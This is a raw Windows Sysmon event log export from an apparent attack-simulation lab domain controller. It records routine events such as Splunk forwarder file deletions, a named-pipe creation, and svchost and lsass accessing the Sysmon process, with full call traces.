16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local2021-03-31 11:59:51.105c:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=19DC8D9827AD6ED2FC4D2E4696C6C2EE28D2EF264911B4FEEFC69502E807F031 23542300x800000000000000038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.715{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94AF41A42A6C8735FE0054B749CF2B6A,SHA256=4C805619C163C2B26C14BF10FC66FCEF400CD59DEA55C2E86BB12FCF1C5315D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.715{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=FDCF19D5594D7C1A5F45871D517F033F,SHA256=700C3D2D4EB2372B5E20B4D75889F0824BA3C3CDBE33683108CF15AA35001C0A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.449{266CAFBE-62DD-6064-1400-00000000AD01}13401756C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:52.418{266CAFBE-62DD-6064-1000-00000000AD01}1144\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDERC:\Windows\system32\svchost.exe 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.418{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:52.402{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 